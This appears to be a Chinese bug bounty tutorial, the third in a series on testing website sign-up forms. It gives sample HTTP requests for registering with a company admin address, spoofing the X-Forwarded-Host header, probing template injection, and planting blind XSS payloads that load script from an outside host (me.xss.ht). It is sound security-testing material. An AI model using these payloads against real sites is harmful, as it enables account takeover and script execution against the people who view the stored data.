查看原文
其他

赏金猎人系列-如何测试注册(Sign up)功能(III)以及相关Tips

Richardo1o1 迪哥讲事 2023-07-11

赏金猎人系列-如何测试注册(Sign up)功能(III)以及相关Tips

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

正文

本文为本系列的第三篇,继续梳理注册功能中可能存在漏洞的测试流程与方法,前面写的系列文章有:

注册功能测试小结

赏金猎人系列-如何测试注册(Sign up)功能

赏金猎人系列-如何测试注册(Sign up)功能以及相关Tips

第十五种方法

尝试用公司邮箱地址来注册,例如admin@company.com,然后尝试访问公司的所有接口,而无需验证admin@company.com


POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

firstname=I&lastname=am&email=admin@company.com&pas sword=*****&captcha=Random&token=CSRF

第十六种方法

如果admin@company.com作为电子邮件地址通过了,但是不能激活,可以尝试欺骗主机头,例如x-forward-HostX-Host


POST /signUp HTTP/1.1
Host: www.company.com
X-Forwarded-Host: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

firstname=I&lastname=am&email=admin@gmail.com&password= ********&captcha=Random&token=CSRF

第十七种方法

尝试在用户名中插入SSTI的payload,比如: {{7*7}} , {7*7}或者${7*7}


POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

firstname={{7*7}}&lastname={{7*7}}&username={{7*7}} &email=me&password=*****&captcha=Random&token=CSRF

第十八种方法

尝试在用户名中插入<%,如果在邮件正文中发现<%起到作用,尝试注入<%= 7 * 7 %>看看有没ssti漏洞

第十九种方法

尝试在名字中注入盲xss的payload: "><script src=//me.xss.ht></script>,查看一下有没有Blind xss


POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: Number

firstname="><script src=//me.xss.ht></script>
&lastname="><script src=//me.xss.ht></script>&
email=me@gmail.com&password=**************&captcha=Random &token=CSRF

第二十种方法

尝试在名字中注入盲xss的payload: <img src="//me.xss.ht">,查看一下有无Blind xss


POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: Number

firstname=<img src="//me.xss.ht">
&lastname=<img src="//me.xss.ht">&
email=me@gmail.com&password=**************&captcha=Random &token=CSRF

第二十一种方法

在设置密码时尝试注入盲xss的payload:"><script src=//me.xss.ht></script>


POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

firstname=I&lastname=am&email=me&password="><script src=//me.xss.ht></script>&captcha=Random&token=CSRF

参考

https://rohitcoder.medium.com/facebook-workplace-bug-exposed-offsite-employee-events-sensitive-emails-putting-employees-at-risk-813d77a0c0ab

https://gauravnarwani.com/injecting-6200-to-1200/

https://verneet.com/fuzzing-77-till-p1/

https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html

https://hackerone.com/reports/423541

https://medium.com/@akshukatkar/rce-with-flask-jinja-template-injection-ea5d0201b870

https://hackerone.com/reports/251224

https://twitter.com/intigriti/status/1072181482028978177

https://hackerone.com/reports/7995


您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存